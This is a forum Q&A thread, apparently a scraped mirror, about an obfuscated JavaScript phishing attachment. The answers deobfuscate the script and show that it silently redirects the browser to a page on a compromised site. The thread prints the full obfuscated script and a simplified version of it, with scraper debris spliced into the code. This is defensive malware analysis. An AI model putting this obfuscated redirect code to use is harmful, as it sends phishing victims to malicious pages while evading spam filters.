开发者

What does this suspicious phishing code do?

A few of my non-IT coworkers opened a .html attachment in an email message that looks extremely suspicious. It resulted in a blank screen when it appears that some javascript code was run.

<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.rep开发者_开发知识库lace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>

What did it do? It's beyond the scope of my programming knowledge.


It will redirect to an url, 'http://lendermedia.com/images/z.htm' (follow it on your own risk).

Copy and paste the code to a worthy JavaScript editor and have it format the source for you.

Key points:

var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');

h will equal 'http://lendermedia.com/images/z.htm'

t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];

t will contain a reference to document.location

b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;

The property named href of b, which at this point (inside another function) really is t from the above statement, is set to h, which is the url.

Most of the code is mere noise, the actual functionality consists of this:

function uK() {
};
uK.prototype = {
  f : function() {
    var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'
        .replace(/[\^H\!9X]/g, '');
    t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];
    function x(b) {
      b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;
    }
    x(t);
  }
};
var tL = new uK();
tL.f();


I encountered the same issue, and then found this page. After doing a WHOIS for the contact info, I contacted the owner of lendermedia.com, who appeared to have just found out that his site is hosting the z.htm page w/out his knowledge and against his wishes. At the time I contacted him I was able to browse his /images/ directory. He has since changed the permissions. All this to say that it appears this guy is clean, but that's for you to decide.


Minus the obfuscation, it does something like document.location.href="http://lendermedia.com/images/z.htm"


Key part to understand that code is the replace(/[\^H\!9X]/g, '') parts. if the 2nd argument for the replace is '', then it's merely removing stuff from the previous string.

Really inelegant way to obfuscate things. Probably the aim is just to be random for each user and avoid Bayesian spam filters.

0

上一篇:

下一篇:

精彩评论

暂无评论...
验证码 换一张
取 消

最新问答

问答排行榜